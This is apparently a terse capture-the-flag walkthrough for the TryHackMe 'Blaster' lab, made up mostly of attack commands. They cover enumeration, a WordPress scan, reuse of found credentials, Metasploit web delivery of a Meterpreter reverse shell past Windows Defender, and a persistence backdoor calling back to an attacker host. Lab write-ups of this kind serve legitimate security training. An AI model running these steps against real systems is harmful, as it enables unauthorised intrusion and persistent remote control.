TryHackMe: Blaster

  1. How many ports are open on our target system?
autorecon <ip>
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi
wpscan --url http://<ip>/retro/ -et -ep -eu
http://<ip>/retro/wp-login.php
Wade : parzival
remmina
  1. When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?
systeminfo
sc query windefend
C:\Windows\System32\cmd.exe  -> Press Enter
cd \Users\Administrator\Desktop
dir
type root.txt
  1. Return to your attacker machine for this next bit. Since we know our victim machine is running Windows Defender, let’s go ahead and try a different method of payload delivery! For this, we’ll be using the script web delivery exploit within Metasploit. Launch Metasploit now and select ‘exploit/multi/script/web_delivery’ for use.
msfconsole
use exploit/multi/script/web_delivery
show targets
set target 2
set lhost <attacker ip>
set lport <attacker port>
set payload windows/meterpreter/reverse_http
run -j
show options
set srvport 8000
run -j
run persistence -X
run persistence -X -r <attacker ip>
background
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker ip>
set LPORT 1234
show options
sessions 1
reboot
